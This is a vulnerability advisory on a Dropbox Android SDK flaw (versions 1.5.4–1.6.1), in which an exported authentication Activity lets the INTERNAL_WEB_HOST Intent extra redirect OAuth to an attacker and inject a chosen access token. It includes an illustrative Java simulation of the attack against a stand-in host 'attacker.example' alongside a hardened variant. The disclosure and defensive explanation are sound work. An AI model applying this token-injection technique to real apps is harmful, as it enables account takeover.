Dropbox Android SDK INTERNAL_WEB_HOST Security Bypass

Aleph Research Advisory

Affected Product

Dropbox Android SDK

Vulnerable Version

Versions 1.5.4 - 1.6.1

Fixed Version

Use version 1.6.2 or later.

Technical Details

This vulnerability lets an adversary inject an arbitrary OAuth access token into the Dropbox SDK, completely bypassing its nonce protection.

The vulnerable code belongs to the Activity responsible for Dropbox authentication, which consumes several Intent extras. Because the browser must be able to invoke this Activity, it is exported, so both malware installed on the device and malicious websites can launch it with an arbitrary Intent payload.

Consumption of one particular extra, INTERNAL_WEB_HOST, has devastating consequences. When the Dropbox app is not installed, the SDK falls back to the browser to authenticate the user and authorize the app to access the user's Dropbox account, and in that flow this extra ultimately controls the host the browser navigates to. An attacker who can deliver an Intent targeting the Activity with INTERNAL_WEB_HOST pointing at his or her own server therefore has the whole authentication flow run against that server. The nonce the SDK generates to bind the callback to the request travels to the attacker as part of that flow, so the attacker can answer with a callback that carries the correct nonce together with an attacker-chosen OAuth access token, which the SDK accepts. The nonce only proves that the callback came from whoever saw the authorization URL; once the attacker controls where that URL is sent, it proves nothing.
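The following plain-Java model is an added illustration and is not code from the Dropbox SDK or from the advisory. It reproduces the decision described above in both directions: an auth flow that takes the web host from an Intent extra (the vulnerable behaviour) beside one that ignores the extra unless the SDK itself launched the Activity and the host is on an allowlist (an illustrative hardening, not necessarily what 1.6.2 did). The class and method names, the URL shape and query parameters, the default host, the app key and the `launchedBySdk` flag (which stands in for whatever mechanism an app uses to tell its own launch from an external one) are all assumptions made for the example; only the extra name INTERNAL_WEB_HOST comes from the advisory.

```java
import java.net.URI;
import java.security.SecureRandom;
import java.util.Map;
import java.util.Set;

/*
 * Added illustration; not the Dropbox SDK's code. Models the auth Activity
 * reading the web host from an Intent extra and sending the browser there
 * with a fresh nonce. Names, URL shape and defaults are assumptions.
 */
public class WebHostExample {

    static final String EXTRA_WEB_HOST = "INTERNAL_WEB_HOST";   // extra named in the advisory
    static final String DEFAULT_WEB_HOST = "www.dropbox.com";   // assumed default host
    static final Set<String> ALLOWED_HOSTS = Set.of("www.dropbox.com"); // illustrative allowlist
    static final String APP_KEY = "app-key-placeholder";        // assumed app key

    /** Minimal model of the per-authentication state the SDK keeps. */
    static final class AuthFlow {
        private final boolean pinHost;   // false: vulnerable behaviour, true: hardened
        private String nonce;            // value the callback must echo back
        private String accessToken;      // set only when a callback is accepted

        AuthFlow(boolean pinHost) { this.pinHost = pinHost; }

        /**
         * Models onCreate(): `extras` stands for the launch Intent's extras,
         * `launchedBySdk` for whatever the app uses to tell its own launch
         * from an external one (malware, or an intent: URL from a web page).
         * Returns the URL the browser is sent to.
         */
        String start(Map<String, String> extras, boolean launchedBySdk) {
            nonce = freshNonce();
            String requested = extras.get(EXTRA_WEB_HOST);
            String host;
            if (!pinHost) {
                // Vulnerable: the extra wins, whoever supplied it.
                host = requested != null ? requested : DEFAULT_WEB_HOST;
            } else {
                // Hardened: only the SDK's own launch may override the host,
                // and only with an allowed value; anything else is ignored.
                boolean ok = launchedBySdk && requested != null && ALLOWED_HOSTS.contains(requested);
                host = ok ? requested : DEFAULT_WEB_HOST;
            }
            // Path and query parameter names are illustrative, not the SDK's.
            return "https://" + host + "/authorize?k=" + APP_KEY + "&n=" + nonce;
        }

        /** Models the callback that delivers the token; the nonce check is the only binding. */
        boolean onCallback(String callbackNonce, String token) {
            if (nonce == null || !nonce.equals(callbackNonce)) {
                return false;
            }
            accessToken = token;
            return true;
        }

        String accessToken() { return accessToken; }

        private static String freshNonce() {
            byte[] raw = new byte[16];
            new SecureRandom().nextBytes(raw);
            StringBuilder sb = new StringBuilder();
            for (byte b : raw) {
                sb.append(String.format("%02x", b));
            }
            return sb.toString();
        }
    }

    /** Models the attacker's server: it learns the nonce only if the browser actually contacts it. */
    static String nonceSeenBy(String attackerHost, String url) {
        URI u = URI.create(url);
        if (!attackerHost.equals(u.getHost())) {
            return null;
        }
        for (String p : u.getRawQuery().split("&")) {
            if (p.startsWith("n=")) {
                return p.substring(2);
            }
        }
        return null;
    }

    /** Runs the attack the advisory describes against one flow variant. */
    static boolean attack(AuthFlow flow) {
        // External launch (not by the SDK) carrying the attacker's host in the extra.
        Map<String, String> malicious = Map.of(EXTRA_WEB_HOST, "attacker.example");
        String url = flow.start(malicious, false);
        String leaked = nonceSeenBy("attacker.example", url);
        // The attacker replays the nonce it saw together with a token it chose.
        return leaked != null && flow.onCallback(leaked, "attacker-chosen-token");
    }

    public static void main(String[] args) {
        AuthFlow vulnerable = new AuthFlow(false);
        AuthFlow hardened = new AuthFlow(true);
        System.out.println("vulnerable variant, token injected: " + attack(vulnerable)
                + " (" + vulnerable.accessToken() + ")");
        System.out.println("hardened variant,   token injected: " + attack(hardened)
                + " (" + hardened.accessToken() + ")");
    }
}
```

Run it with `java WebHostExample.java` (Java 11 or later). In the vulnerable variant the browser is sent to attacker.example, the nonce arrives there, and the replayed callback passes the nonce check with the attacker's token; in the hardened variant the extra is ignored, the browser goes to the default host, the attacker never sees a nonce, and the callback is rejected. The design point is that on Android the extras of an exported Activity are attacker input and must never select a security-relevant destination; the nonce is not a substitute for that check.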



External References